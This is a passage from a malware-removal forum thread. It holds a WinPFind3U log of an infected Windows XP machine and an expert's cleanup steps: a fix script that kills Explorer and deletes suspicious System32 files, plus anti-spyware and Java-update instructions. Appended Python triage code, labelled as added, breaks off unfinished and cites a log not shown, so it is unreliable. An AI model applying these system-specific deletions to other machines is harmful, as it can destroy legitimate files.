HKCU: Search Page -> http://www.microsoft.com/isapi/redir.dll?p...amp;ar=iesearch ->
HKCU: Start Page -> http://www.yahoo.com/ ->
HKCU: ProxyEnable -> 0 ->
< Trusted Sites > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\
msn.com [ - ] -> ->
< BHO's > -> HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\
{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} [HKLM] -> %ProgramFiles%\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll [Adobe PDF Reader Link Helper] -> Adobe Systems Incorporated [Ver = 7.0.7.2006011200 | Size = 63128 bytes | Modified Date = 1/12/2006 8:38:22 PM | Attr = ]
{53707962-6F74-2D53-2644-206D7942484F} [HKLM] -> %ProgramFiles%\Spybot - Search & Destroy\SDHelper.dll [] -> Safer Networking Limited [Ver = 1, 4, 0, 0 | Size = 853672 bytes | Modified Date = 5/31/2005 1:04:00 AM | Attr = ]
{5CA3D70E-1895-11CF-8E15-001234567890} [HKLM] -> %System32%\dla\tfswshx.dll [DriveLetterAccess] -> Sonic Solutions [Ver = 1.04.05b | Size = 106548 bytes | Modified Date = 8/6/2003 2:04:00 AM | Attr = ]
< Internet Explorer Bars [HKCU] > -> HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Explorer Bars\
{32683183-48a0-441b-a342-7c2a440a9478} [HKLM] -> Reg Data - Key not found [Reg Data - Key not found] -> File not found
< Internet Explorer ToolBars [HKLM] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ToolBar
{BA52B914-B692-46c4-B683-905236F6F655} [HKLM] -> Reg Data - Key not found [Reg Data - Key not found] -> File not found
< Internet Explorer ToolBars [HKCU] > -> HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\
ShellBrowser\\{42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6} [HKLM] -> Reg Data - Key not found [Reg Data - Key not found] -> File not found
WebBrowser\\{42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6} [HKLM] -> Reg Data - Key not found [Reg Data - Key not found] -> File not found
< Internet Explorer Extensions [HKLM] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extensions\
{08B0E5C0-4FCB-11CF-AAA5-00401C608501} [HKLM] -> %System32%\msjava.dll [MenuText: Sun Java Console] -> File not found
{6224f700-cba3-4071-b251-47cb894244cd} -> %ProgramFiles%\ICQ\Icq.exe [ButtonText: ICQ Pro] -> ICQ Inc. [Ver = 5,5,6,3916 | Size = 1880639 bytes | Modified Date = 10/14/2003 12:03:50 PM | Attr = ]
{B7FE5D70-9AA2-40F1-9C6B-12A255F085E1} -> %ProgramFiles%\PartyPoker\PartyPoker.exe [ButtonText: PartyPoker.com] -> iGlobalMedia.com [Ver = 1, 0, 0, 1 | Size = 2613248 bytes | Modified Date = 7/8/2005 10:09:02 PM | Attr = ]
{CD67F990-D8E9-11d2-98FE-00C0F0318AFE} -> Reg Data - Value does not exist [ButtonText: Real.com] -> File not found
< Internet Explorer Menu Extensions [HKCU] > -> HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\
E&xport to Microsoft Excel -> -> File not found
< Internet Explorer Plugins [HKLM] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Plugins\Extension\
.spop -> %ProgramFiles%\Internet Explorer\PLUGINS\NPDocBox.dll [Reg Data - Value does not exist] -> Intertrust Technologies, Inc. [Ver = 1.0.0.32 | Size = 270336 bytes | Modified Date = 8/1/2001 5:05:42 PM | Attr = ]
< User Agent Post Platform [HKLM] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\Post Platform
SV1 -> ->
< DNS Name Servers [HKLM] > -> HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Adapters\
{0581109B-E7CC-4D2F-B921-CCF4FB6790E4} -> (Linksys Wireless-G Portable USB Adapter) ->
{20D39951-162D-4C18-BA0D-C3EEBE0EB3AB} -> (D-Link AirPlus G DWL-G510 Wireless PCI Card) ->
{4B250AFE-87CE-406A-B213-8C7324DF6680} -> (Intel® PRO/100 VE Network Connection) ->
{54C8B121-B672-4595-9CA6-5143E89EBCF9} -> (Linksys Wireless-G Portable USB Adapter) ->
{86F8ED03-8E4A-4B80-9904-0E7D717F5A6F} -> (Linksys Wireless-G Portable USB Adapter) ->
{AAB4CE79-BE6C-443B-B902-938DDEE245DC} -> () ->
{DDE840E8-BF69-465D-9359-CB4DE1510B2C} -> (Linksys Wireless-G Portable USB Adapter) ->
< Winsock2 Catalogs [HKLM] > -> HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\
Protocol_Catalog9\Catalog_Entries\000000000001 -> %System32%\VetRedir.dll -> Computer Associates International, Inc. [Ver = Version 11.0.7.7 | Size = 74864 bytes | Modified Date = 6/25/2006 9:37:30 PM | Attr = ]
Protocol_Catalog9\Catalog_Entries\000000000002 -> %System32%\VetRedir.dll -> Computer Associates International, Inc. [Ver = Version 11.0.7.7 | Size = 74864 bytes | Modified Date = 6/25/2006 9:37:30 PM | Attr = ]
Protocol_Catalog9\Catalog_Entries\000000000003 -> %System32%\VetRedir.dll -> Computer Associates International, Inc. [Ver = Version 11.0.7.7 | Size = 74864 bytes | Modified Date = 6/25/2006 9:37:30 PM | Attr = ]
Protocol_Catalog9\Catalog_Entries\000000000009 -> %System32%\VetRedir.dll -> Computer Associates International, Inc. [Ver = Version 11.0.7.7 | Size = 74864 bytes | Modified Date = 6/25/2006 9:37:30 PM | Attr = ]
< Protocol Handlers [HKLM] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\
ipp -> Reg Data - Key not found -> File not found
lbxfile -> %ProgramFiles%\Libronix DLS\System\FileProt.dll -> Libronix Corporation [Ver = 2.1.90.1 | Size = 184320 bytes | Modified Date = 4/27/2004 2:25:54 AM | Attr = ]
lbxres -> %ProgramFiles%\Libronix DLS\System\ResProt.dll -> Libronix Corporation [Ver = 2.1.93.1 | Size = 131072 bytes | Modified Date = 4/27/2004 2:29:20 AM | Attr = ]
msdaipp -> Reg Data - Key not found -> File not found
< Downloaded Program Files > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\
{33564D57-0000-0010-8000-00AA00389B71} -> - CodeBase = http://download.microsoft.com/download/F/6...922/wmv9VCM.CAB ->
{4C39376E-FA9D-4349-BACC-D305C1750EF3} -> EPUImageControl Class - CodeBase = http://tools.ebayimg.com/eps/wl/activex/eB...l_v1-0-3-30.cab ->
{4F1E5B1A-2A80-42CA-8532-2D05CB959537} -> MSN Photo Upload Tool - CodeBase = http://by103fd.bay103.hotmail.msn.com/resources/MsnPUpld.cab ->
{8AD9C840-044E-11D1-B3E9-00805F499D93} -> Java Plug-in 1.4.2_04 - CodeBase = http://java.sun.com/update/1.4.2/jinstall-...indows-i586.cab ->
{8E0D4DE5-3180-4024-A327-4DFAD1796A8D} -> MessengerStatsClient Class - CodeBase = http://messenger.zone.msn.com/binary/Messe...nt.cab31267.cab ->
{A8658086-E6AC-4957-BC8E-8D54A7E8A790} -> GDIChk Object - CodeBase = http://www.microsoft.com/security/controls/GDI/0/GDIChk.CAB ->
{AB86CE53-AC9F-449F-9399-D8ABCA09EC09} -> Get_ActiveX Control - CodeBase = https://h17000.www1.hp.com/ewfrf-JAVA/Secur...loadManager.ocx ->
{CAFEEFAC-0014-0002-0004-ABCDEFFEDCBA} -> Java Plug-in 1.4.2_04 - CodeBase = http://java.sun.com/products/plugin/autodl...indows-i586.cab ->
{D1E7CBDA-E60E-4970-A01C-37301EF7BF98} -> Measurement Services Client v.3.7 - CodeBase = http://gameadvisor.futuremark.com/global/msc37.cab ->
{D27CDB6E-AE6D-11CF-96B8-444553540000} -> Shockwave Flash Object - CodeBase = http://download.macromedia.com/pub/shockwa...ash/swflash.cab ->

[Files/Folders - Created Within 90 days]
nvapps.xml -> %SystemDrive%\nvapps.xml -> [Ver = | Size = 38905 bytes | Created Date = 6/2/2007 5:12:25 PM | Attr = ]
$NtUninstallKB925902$ -> %SystemRoot%\$NtUninstallKB925902$ -> [Folder | Created Date = 4/4/2007 3:00:57 AM | Attr = H ]
$NtUninstallKB927891$ -> %SystemRoot%\$NtUninstallKB927891$ -> [Folder | Created Date = 5/22/2007 5:13:44 PM | Attr = H ]
$NtUninstallKB929338$ -> %SystemRoot%\$NtUninstallKB929338$ -> [Folder | Created Date = 3/14/2007 3:01:01 AM | Attr = H ]
$NtUninstallKB930178$ -> %SystemRoot%\$NtUninstallKB930178$ -> [Folder | Created Date = 4/12/2007 3:01:11 AM | Attr = H ]
$NtUninstallKB930916$ -> %SystemRoot%\$NtUninstallKB930916$ -> [Folder | Created Date = 5/14/2007 3:02:27 AM | Attr = H ]
$NtUninstallKB931261$ -> %SystemRoot%\$NtUninstallKB931261$ -> [Folder | Created Date = 4/12/2007 3:01:20 AM | Attr = H ]
$NtUninstallKB931768$ -> %SystemRoot%\$NtUninstallKB931768$ -> [Folder | Created Date = 5/14/2007 3:02:44 AM | Attr = H ]
$NtUninstallKB931784$ -> %SystemRoot%\$NtUninstallKB931784$ -> [Folder | Created Date = 4/12/2007 3:02:17 AM | Attr = H ]
$NtUninstallKB932168$ -> %SystemRoot%\$NtUninstallKB932168$ -> [Folder | Created Date = 4/12/2007 3:00:58 AM | Attr = H ]
spupdsvc.dll -> %SystemRoot%\spupdsvc.dll -> [Ver = | Size = 473600 bytes | Created Date = 3/31/2007 10:44:30 PM | Attr = ]
spupdsvc.exe -> %SystemRoot%\spupdsvc.exe -> [Ver = | Size = 201708 bytes | Created Date = 3/31/2007 10:44:28 PM | Attr = ]
@Alternate Data Stream - 26 bytes -> %SystemRoot%\spupdsvc.exe:Zone.Identifier ->
spupdsvcHook.dll -> %SystemRoot%\spupdsvcHook.dll -> [Ver = | Size = 91648 bytes | Created Date = 3/31/2007 10:44:37 PM | Attr = RHS]
a.exe -> %System32%\a.exe -> [Ver = | Size = 521728 bytes | Created Date = 6/10/2007 1:03:56 AM | Attr = ]
iaxcfg32.dll -> %System32%\iaxcfg32.dll -> [Ver = | Size = 840 bytes | Created Date = 3/29/2007 1:27:36 PM | Attr = ]
istjor.exe -> %System32%\istjor.exe -> [Ver = | Size = 4096 bytes | Created Date = 6/10/2007 1:03:54 AM | Attr = R ]
ktzobo.exe -> %System32%\ktzobo.exe -> [Ver = | Size = 27668 bytes | Created Date = 4/3/2007 12:14:46 PM | Attr = R ]
MRT.INI -> %System32%\MRT.INI -> [Ver = | Size = 4701 bytes | Created Date = 4/12/2007 3:02:04 AM | Attr = ]
NvApps.xml -> %System32%\NvApps.xml -> [Ver = | Size = 0 bytes | Created Date = 6/9/2007 10:57:25 AM | Attr = ]
wmism23delete.exe -> %System32%\wmism23delete.exe -> [Ver = | Size = 1623040 bytes | Created Date = 4/25/2007 5:02:21 PM | Attr = R ]

[Files/Folders - Modified Within 90 days]
BOOT.INI -> %SystemDrive%\BOOT.INI -> [Ver = | Size = 211 bytes | Modified Date = 5/31/2007 7:22:14 AM | Attr = RHS]
Downloaded Full Apps -> %SystemDrive%\Downloaded Full Apps -> [Folder | Modified Date = 6/2/2007 6:37:18 PM | Attr = ]
hiberfil.sys -> %SystemDrive%\hiberfil.sys -> [Ver = | Size = 535875584 bytes | Modified Date = 6/9/2007 11:55:20 AM | Attr = HS]
hpfr5550.xml -> %SystemDrive%\hpfr5550.xml -> [Ver = | Size = 488 bytes | Modified Date = 5/22/2007 3:05:10 AM | Attr = ]
nvapps.xml -> %SystemDrive%\nvapps.xml -> [Ver = | Size = 38905 bytes | Modified Date = 6/2/2007 6:08:26 PM | Attr = ]
Program Files -> %ProgramFiles% -> [Folder | Modified Date = 6/11/2007 9:47:04 PM | Attr = R ]
WINDOWS -> %SystemRoot% -> [Folder | Modified Date = 6/11/2007 11:57:30 AM | Attr = ]
$hf_mig$ -> %SystemRoot%\$hf_mig$ -> [Folder | Modified Date = 5/22/2007 6:13:22 PM | Attr = H ]
$NtUninstallKB925902$ -> %SystemRoot%\$NtUninstallKB925902$ -> [Folder | Modified Date = 4/4/2007 4:01:00 AM | Attr = H ]
$NtUninstallKB927891$ -> %SystemRoot%\$NtUninstallKB927891$ -> [Folder | Modified Date = 5/22/2007 6:13:46 PM | Attr = H ]
$NtUninstallKB929338$ -> %SystemRoot%\$NtUninstallKB929338$ -> [Folder | Modified Date = 3/14/2007 4:01:04 AM | Attr = H ]
$NtUninstallKB930178$ -> %SystemRoot%\$NtUninstallKB930178$ -> [Folder | Modified Date = 4/12/2007 4:01:14 AM | Attr = H ]
$NtUninstallKB930916$ -> %SystemRoot%\$NtUninstallKB930916$ -> [Folder | Modified Date = 5/14/2007 4:02:28 AM | Attr = H ]
$NtUninstallKB931261$ -> %SystemRoot%\$NtUninstallKB931261$ -> [Folder | Modified Date = 4/12/2007 4:01:22 AM | Attr = H ]
$NtUninstallKB931768$ -> %SystemRoot%\$NtUninstallKB931768$ -> [Folder | Modified Date = 5/14/2007 4:02:48 AM | Attr = H ]
$NtUninstallKB931784$ -> %SystemRoot%\$NtUninstallKB931784$ -> [Folder | Modified Date = 4/12/2007 4:02:20 AM | Attr = H ]
$NtUninstallKB932168$ -> %SystemRoot%\$NtUninstallKB932168$ -> [Folder | Modified Date = 4/12/2007 4:01:00 AM | Attr = H ]
1Way.ini -> %SystemRoot%\1Way.ini -> [Ver = | Size = 315 bytes | Modified Date = 5/10/2007 10:30:36 PM | Attr = ]
BOOTSTAT.DAT -> %SystemRoot%\BOOTSTAT.DAT -> [Ver = | Size = 2048 bytes | Modified Date = 6/9/2007 11:55:24 AM | Attr = S]
CAVTemp -> %SystemRoot%\CAVTemp -> [Folder | Modified Date = 6/1/2007 9:46:04 PM | Attr = ]
Help -> %SystemRoot%\Help -> [Folder | Modified Date = 5/22/2007 2:31:56 PM | Attr = ]
imsins.BAK -> %SystemRoot%\imsins.BAK -> [Ver = | Size = 1374 bytes | Modified Date = 5/14/2007 4:03:02 AM | Attr = ]
INF -> %SystemRoot%\INF -> [Folder | Modified Date = 5/22/2007 6:13:54 PM | Attr = H ]
Minidump -> %SystemRoot%\Minidump -> [Folder | Modified Date = 5/5/2007 11:19:12 AM | Attr = ]
MSAGENT -> %SystemRoot%\MSAGENT -> [Folder | Modified Date = 4/12/2007 4:09:08 AM | Attr = ]
Prefetch -> %SystemRoot%\Prefetch -> [Folder | Modified Date = 6/11/2007 9:50:42 PM | Attr = ]
quark.ini -> %SystemRoot%\quark.ini -> [Ver = | Size = 33 bytes | Modified Date = 3/30/2007 7:45:48 AM | Attr = ]
SECURITY -> %SystemRoot%\SECURITY -> [Folder | Modified Date = 4/12/2007 4:08:30 AM | Attr = ]
SoftwareDistribution -> %SystemRoot%\SoftwareDistribution -> [Folder | Modified Date = 5/22/2007 2:31:56 PM | Attr = ]
spupdsvc.dll -> %SystemRoot%\spupdsvc.dll -> [Ver = | Size = 473600 bytes | Modified Date = 3/31/2007 11:44:32 PM | Attr = ]
spupdsvc.exe -> %SystemRoot%\spupdsvc.exe -> [Ver = | Size = 201708 bytes | Modified Date = 3/31/2007 11:44:28 PM | Attr = ]
@Alternate Data Stream - 26 bytes -> %SystemRoot%\spupdsvc.exe:Zone.Identifier ->
spupdsvcHook.dll -> %SystemRoot%\spupdsvcHook.dll -> [Ver = | Size = 91648 bytes | Modified Date = 3/31/2007 11:44:38 PM | Attr = RHS]
SYSTEM.INI -> %SystemRoot%\SYSTEM.INI -> [Ver = | Size = 227 bytes | Modified Date = 5/31/2007 7:22:14 AM | Attr = ]
SYSTEM32 -> %System32% -> [Folder | Modified Date = 6/10/2007 10:43:30 PM | Attr = ]
Temp -> %SystemRoot%\Temp -> [Folder | Modified Date = 6/9/2007 11:55:58 AM | Attr = ]
WIN.INI -> %SystemRoot%\WIN.INI -> [Ver = | Size = 836 bytes | Modified Date = 5/31/2007 7:22:14 AM | Attr = ]
SA.DAT -> %SystemRoot%\tasks\SA.DAT -> [Ver = | Size = 6 bytes | Modified Date = 6/9/2007 11:55:32 AM | Attr = H ]
a.exe -> %System32%\a.exe -> [Ver = | Size = 521728 bytes | Modified Date = 6/10/2007 2:04:02 AM | Attr = ]
CatRoot2 -> %System32%\CatRoot2 -> [Folder | Modified Date = 6/1/2007 7:05:40 PM | Attr = ]
DLLCACHE -> %System32%\DLLCACHE -> [Folder | Modified Date = 5/29/2007 4:03:52 PM | Attr = RHS]
DRIVERS -> %System32%\DRIVERS -> [Folder | Modified Date = 6/9/2007 11:55:42 AM | Attr = ]
FNTCACHE.DAT -> %System32%\FNTCACHE.DAT -> [Ver = | Size = 4350120 bytes | Modified Date = 4/4/2007 4:07:28 AM | Attr = ]
iaxcfg32.dll -> %System32%\iaxcfg32.dll -> [Ver = | Size = 840 bytes | Modified Date = 6/10/2007 2:04:04 AM | Attr = ]
istjor.exe -> %System32%\istjor.exe -> [Ver = | Size = 4096 bytes | Modified Date = 6/10/2007 2:03:56 AM | Attr = R ]
ktzobo.exe -> %System32%\ktzobo.exe -> [Ver = | Size = 27668 bytes | Modified Date = 4/3/2007 1:14:52 PM | Attr = R ]
MRT.INI -> %System32%\MRT.INI -> [Ver = | Size = 4701 bytes | Modified Date = 4/12/2007 4:02:06 AM | Attr = ]
NvApps.xml -> %System32%\NvApps.xml -> [Ver = | Size = 0 bytes | Modified Date = 6/9/2007 11:57:26 AM | Attr = ]
PERFC009.DAT -> %System32%\PERFC009.DAT -> [Ver = | Size = 60550 bytes | Modified Date = 6/9/2007 12:00:00 PM | Attr = ]
PERFH009.DAT -> %System32%\PERFH009.DAT -> [Ver = | Size = 398180 bytes | Modified Date = 6/9/2007 12:00:00 PM | Attr = ]
PerfStringBackup.INI -> %System32%\PerfStringBackup.INI -> [Ver = | Size = 465758 bytes | Modified Date = 6/9/2007 11:59:58 AM | Attr = ]
wmism23delete.exe -> %System32%\wmism23delete.exe -> [Ver = | Size = 1623040 bytes | Modified Date = 4/25/2007 6:21:12 PM | Attr = R ]
WPA.DBL -> %System32%\WPA.DBL -> [Ver = | Size = 1170 bytes | Modified Date = 6/9/2007 11:56:54 AM | Attr = ]
VetEBoot.sys -> %System32%\drivers\VetEBoot.sys -> Computer Associates International, Inc. [Ver = 30.7.0.0 | Size = 108656 bytes | Modified Date = 5/4/2007 8:56:10 AM | Attr = ]
VetEFile.sys -> %System32%\drivers\VetEFile.sys -> Computer Associates International, Inc. [Ver = 30.7.0.0 | Size = 630464 bytes | Modified Date = 5/4/2007 8:56:10 AM | Attr = ]

[File String Scan - Non-Microsoft Only]
@Alternate Data Stream - 26 bytes -> %SystemRoot%\spupdsvc.exe:Zone.Identifier ->
MZKERNEL32.DLL , -> %SystemRoot%\spupdsvc.exe -> [Ver = | Size = 201708 bytes | Modified Date = 3/31/2007 11:44:28 PM | Attr = ]
PEC2 , -> %System32%\DFRG.MSC -> [Ver = | Size = 41397 bytes | Modified Date = 8/29/2002 6:00:00 AM | Attr = ]
aspack , -> %System32%\TFTP1296 -> [Ver = | Size = 1024 bytes | Modified Date = 3/30/2007 10:58:40 PM | Attr = R ]
winsync , -> %System32%\WBDBASE.DEU -> [Ver = | Size = 1309184 bytes | Modified Date = 8/29/2002 6:00:00 AM | Attr = ]
Thawte Consulting , -> %System32%\XceedFtp.dll -> Xceed Software Inc (450) 442-2626 support@xceedsoft.com www.xceedsoft.com [Ver = 1.0.42.0 | Size = 236576 bytes | Modified Date = 10/2/2003 6:36:22 PM | Attr = ]
WSUD , UPX0 , -> %System32%\dllcache\hwxjpn.dll -> [Ver = | Size = 13463552 bytes | Modified Date = 8/29/2002 6:00:00 AM | Attr = ]
PTech , -> %System32%\drivers\mtlstrm.sys -> Smart Link [Ver = 3.80.01MC15 | Size = 1309184 bytes | Modified Date = 8/4/2004 12:41:38 AM | Attr = ]

< End of report >

#4 DigitalFool

DigitalFool
  • Topic Starter

  • Members
  • 39 posts
  • OFFLINE
  • Local time:03:36 PM

Posted 11 June 2007 - 10:34 PM

I got rid of istjor.exe and a.exe - but these weird file names just keep popping up with 4 or 5 instances of them active in task manager... I can't find the root cause... hope those logs help.

#5 OldTimer

OldTimer

    Malware Expert


  • Members
  • 11,092 posts
  • OFFLINE
  • Gender:Male
  • Location:North Carolina
  • Local time:03:36 PM

Posted 12 June 2007 - 05:36 AM

Hi DigitalFool. Ok, let's get started. First, please print these directions so they will be available to you (we will be rebooting into Safe Mode during the fix).

Next, please follow the steps below in order:

Step #1

Download AVG anti-spyware from HERE and save that file to your desktop.
  • Once you have downloaded AVG Anti-Spyware, locate the icon on the desktop and double-click it to launch the set up program.
  • Once the setup is complete you will need to run AVG Anti-Spyware and update the definition files.
  • On the main screen select the icon "Update" then select the "Update now" link.
    • Next select the "Start Update" button, the update will start and a progress bar will show the updates being installed.
  • Once the update has completed select the "Scanner" icon at the top of the screen, then select the "Settings" tab.
  • Once in the Settings screen, under "How to act" select "Quarantine".
  • Under "Reports"
    • Select "Automatically generate report after every scan"
    • Un-Select "Only if threats were found"
Close AVG Anti-Spyware. Do not run a scan just yet; we will shortly.

Step #2

Now start WinPFind3U. Copy/Paste the information in the quotebox below into the pane where it says "Paste fix here" and then click the Run Fix button.

[Kill Explorer]
[Unregister Dlls]
[Processes - Non-Microsoft Only]
YY -> a.exe -> %System32%\a.exe
YY -> istjor.exe -> %System32%\istjor.exe
YY -> istjor.exe -> %System32%\istjor.exe
YY -> istjor.exe -> %System32%\istjor.exe
YY -> istjor.exe -> %System32%\istjor.exe
YY -> istjor.exe -> %System32%\istjor.exe
YY -> istjor.exe -> %System32%\istjor.exe
[Win32 Services - Non-Microsoft Only]
YY -> (Microsoft Update RunOnce Service) spupdsvc. [Win32_Own | Auto | Stopped] -> %SystemRoot%\spupdsvc.exe
[Registry - Non-Microsoft Only]
< Run [HKLM] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
YY -> MSMSGNER -> %System32%\a.exe
< Run [HKCU] > -> HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
YN -> MoneyAgent -> %ProgramFiles%\Microsoft Money\System\mnyexpr.exe
< Internet Explorer Bars [HKCU] > -> HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Explorer Bars\
YN -> {32683183-48a0-441b-a342-7c2a440a9478} [HKLM] -> Reg Data - Key not found [Reg Data - Key not found]
< Internet Explorer ToolBars [HKLM] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ToolBar
YN -> {BA52B914-B692-46c4-B683-905236F6F655} [HKLM] -> Reg Data - Key not found [Reg Data - Key not found]
< Internet Explorer ToolBars [HKCU] > -> HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\
YN -> ShellBrowser\\{42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6} [HKLM] -> Reg Data - Key not found [Reg Data - Key not found]
YN -> WebBrowser\\{42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6} [HKLM] -> Reg Data - Key not found [Reg Data - Key not found]
< Internet Explorer Extensions [HKLM] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extensions\
YN -> {08B0E5C0-4FCB-11CF-AAA5-00401C608501} [HKLM] -> %System32%\msjava.dll [MenuText: Sun Java Console]
YN -> {CD67F990-D8E9-11d2-98FE-00C0F0318AFE} -> Reg Data - Value does not exist [ButtonText: Real.com]
< Internet Explorer Menu Extensions [HKCU] > -> HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\
YN -> E&xport to Microsoft Excel ->
[Files/Folders - Created Within 90 days]
NY -> spupdsvc.dll -> %SystemRoot%\spupdsvc.dll
NY -> spupdsvc.exe -> %SystemRoot%\spupdsvc.exe
NY -> spupdsvcHook.dll -> %SystemRoot%\spupdsvcHook.dll
NY -> a.exe -> %System32%\a.exe
NY -> iaxcfg32.dll -> %System32%\iaxcfg32.dll
NY -> istjor.exe -> %System32%\istjor.exe
NY -> ktzobo.exe -> %System32%\ktzobo.exe
NY -> wmism23delete.exe -> %System32%\wmism23delete.exe
[Files/Folders - Modified Within 90 days]
NY -> spupdsvc.dll -> %SystemRoot%\spupdsvc.dll
NY -> spupdsvc.exe -> %SystemRoot%\spupdsvc.exe
NY -> spupdsvcHook.dll -> %SystemRoot%\spupdsvcHook.dll
NY -> a.exe -> %System32%\a.exe
NY -> iaxcfg32.dll -> %System32%\iaxcfg32.dll
NY -> istjor.exe -> %System32%\istjor.exe
NY -> ktzobo.exe -> %System32%\ktzobo.exe
NY -> wmism23delete.exe -> %System32%\wmism23delete.exe
[File String Scan - Non-Microsoft Only]
NY -> MZKERNEL32.DLL , -> %SystemRoot%\spupdsvc.exe
NY -> aspack , -> %System32%\TFTP1296
[Empty Temp Folders]
[Reboot]


The fix should only take a very short time. You might be asked to reboot if any of the files could not be moved during the fix. If so, choose Yes and reboot into Safe Mode as shown below. If not, then reboot manually into Safe Mode.

Reboot into Safe Mode by doing the following:
  • As soon as the BIOS is loaded begin tapping the F8 key until the boot menu appears.
  • Use the arrow keys to select the Safe Mode menu item.
  • Press the Enter key.
Step #3

Launch AVG Anti-Spyware by double-clicking the icon on your desktop.

IMPORTANT: Do not open any other windows or programs while AVG Anti-Spyware is scanning; it may interfere with the scanning process:
  • Select the "Scanner" icon at the top and then the "Scan" tab then click on "Complete System Scan".
  • AVG Anti-Spyware will now begin the scanning process, be patient this may take a little time.
    Once the scan is complete do the following:
    • Make sure that Set all elements to: shows Quarantine; if not, click on the link and choose Quarantine from the popup menu.
    • At the bottom of the window click on the "Apply all actions" button
    Note: Don't save the report before you hit the Apply action button.
  • Next select the "Reports" icon at the top.
  • Select the "Save report as" button in the lower left hand of the screen and save it to a text file on your system (make sure to remember where you saved that file, this is important).
  • Close AVG Anti-Spyware and reboot your system back into Normal Mode and post the results of the AVG Anti-Spyware report scan.
Step #4

Your Java is out of date. Older versions have vulnerabilities that malware can use to infect your system. Please follow these steps to remove older version Java components and update.

Updating Java:
Note: If there is an Update XX in the name then the "XX" in the version will be whatever the latest version is.
  • Download the latest version of Java Runtime Environment (JRE) 6.0 Update XX (if present).
  • Scroll down to where it says "The J2SE Runtime Environment (JRE) allows end-users to run Java applications".
  • Click the "Download" button to the right.
  • Check the box that says: "Accept License Agreement".
  • The page will refresh.
  • Click on the link to download Windows Offline Installation with or without Multi-language and save to your desktop.
  • Close any programs you may have running - especially your web browser.
  • Go to Start > Control Panel double-click on Add/Remove programs and remove all older versions of Java.
  • Check any item with Java Runtime Environment (JRE or J2SE) in the name.
  • Click the Remove or Change/Remove button.
  • Repeat as many times as necessary to remove each Java version.
  • Reboot your computer once all Java components are removed.
  • Then from your desktop double-click on jre-1_6_0_XX-windowsi586-p.exe to install the newest version.
Step #5

Post the following back here:
  • a new WinPFind3U report
  • the AVG Anti-Spyware report
  • the latest .log file from the WinPFind3u folder (it will be a .log file and have a date_time name in the format mmddyyyy_hhmmss.log)
I will review the information when it comes back in.

Also let me know of any problems you encountered performing the steps above or any continuing problems you are still having with the computer.

Cheers.

OT
I do not respond to PM's requesting help. That's what the forums are here for. Please use them so that others may benefit from your questions and the responses you receive.
OldTimer

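The signals the fix above keys on (executables dropped straight into System32 with an empty Ver field, no publisher, a fresh modified date and the R attribute) can be scored mechanically from WinPFind3U output. The following Python is an added example, not part of this thread or of OldTimer's WinPFind3U tool; the entry format and the sample lines are copied from the log quoted earlier, one benign control line is adapted from the services section, and the scan time is an assumption.

```python
"""Heuristic triage of WinPFind3U file entries.

Added example, not part of the thread or of WinPFind3U itself. The entry
format and sample lines are copied from the log quoted earlier in the
thread; the scan time is assumed (this section of the log carries none).
"""
import re
from datetime import datetime, timedelta

# One WinPFind3U file entry, as it appears in the thread's log:
#   <name> -> <path> -> <publisher> [Ver = <v> | Size = <n> bytes | Modified Date = <d> | Attr = <a> ]
ENTRY_RE = re.compile(
    r"^(?P<name>.+?) -> (?P<path>%\w+%\\.+?) -> (?P<publisher>.*?)\s*"
    r"\[Ver = (?P<ver>[^|]*)\| Size = (?P<size>\d+) bytes \| "
    r"Modified Date = (?P<mtime>[^|]+)\| Attr = (?P<attr>[^\]]*)\]\s*$"
)

# Only executable content is scored; data files (.DAT, .INI, .xml) are skipped.
EXEC_EXT = {".exe", ".dll", ".sys", ".scr", ".com", ".cpl"}

# Sample entries copied from the log above; the nvsvc32.exe line is a benign
# control adapted from the services section of the later log.
SAMPLE_LOG = [
    r"iaxcfg32.dll -> %System32%\iaxcfg32.dll -> [Ver = | Size = 840 bytes | Modified Date = 6/10/2007 2:04:04 AM | Attr = ]",
    r"istjor.exe -> %System32%\istjor.exe -> [Ver = | Size = 4096 bytes | Modified Date = 6/10/2007 2:03:56 AM | Attr = R ]",
    r"ktzobo.exe -> %System32%\ktzobo.exe -> [Ver = | Size = 27668 bytes | Modified Date = 4/3/2007 1:14:52 PM | Attr = R ]",
    r"MRT.INI -> %System32%\MRT.INI -> [Ver = | Size = 4701 bytes | Modified Date = 4/12/2007 4:02:06 AM | Attr = ]",
    r"wmism23delete.exe -> %System32%\wmism23delete.exe -> [Ver = | Size = 1623040 bytes | Modified Date = 4/25/2007 6:21:12 PM | Attr = R ]",
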